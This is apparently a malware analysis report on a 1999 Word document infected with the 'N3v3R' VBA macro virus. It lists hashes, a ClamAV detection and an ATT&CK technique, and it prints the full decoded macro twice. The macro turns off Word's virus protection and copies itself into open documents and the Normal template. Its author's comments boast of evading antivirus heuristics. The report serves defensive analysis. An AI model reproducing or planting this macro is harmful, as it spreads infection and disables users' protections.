Office (OLE) malware analysis — malicious · d87eea9110f3c04f

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-26 12:28:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 6fa65aa67ef6fdf06b217f66fc1865d2 SHA-1: a6cb09b0caf9f91dd875e52e2bdd32f1fde9e23b SHA-256: d87eea9110f3c04ff9244942422605360f8dcf9489fc1b5cf1efad8d81897b45

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The macros are designed to infect other documents by copying their code to the active document and the normal template. The script also contains logic to set a password on the document under specific conditions, though this payload is not activated. The presence of these self-propagation and obfuscation techniques strongly suggests malicious intent.

Heuristics 2

ClamAV: Doc.Trojan.Ever-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ever-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1409 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1409 bytes
SHA-256: `235dfbc3ab2b57a8feb645880b91ba85b89feca37a1802c48713df1cd7b58b8d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' N3v3R v1.1 by SPo0Ky and Buddy Music of the group VX4U ' 23rd June 1999 ' SR-1 Compatible MS-Word Class bug with 4 lines of code. ' Includes "the basic stuff", a small payload which ' would set a random password (though it never gets activated), ' and as a bonus it is even undetectable by F-Prot's and AVP's ' heuristics :-) Private Sub Document_Close() Options.VirusProtection = False ' the basic stuff you asked for :-) If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the activedocument If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the normaltemplate If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which would set a "random" password if the day is "N3v3R" (enough to prove my point, you know ;-) End Sub

SHA-256: 235dfbc3ab2b57a8feb645880b91ba85b89feca37a1802c48713df1cd7b58b8d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' N3v3R v1.1 by SPo0Ky and Buddy Music of the group VX4U
' 23rd June 1999
' SR-1 Compatible MS-Word Class bug with 4 lines of code.
' Includes "the basic stuff", a small payload which
' would set a random password (though it never gets activated),
' and as a bonus it is even undetectable by F-Prot's and AVP's
' heuristics :-)

Private Sub Document_Close()
Options.VirusProtection = False ' the basic stuff you asked for :-)
If ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the activedocument
If NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100) ' infection and infection check of the normaltemplate
If Day(Now) = "N3v3R" Then ActiveDocument.Password = ActiveDocument.Words(1) ' a payload which would set a "random" password if the day is "N3v3R" (enough to prove my point, you know ;-)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.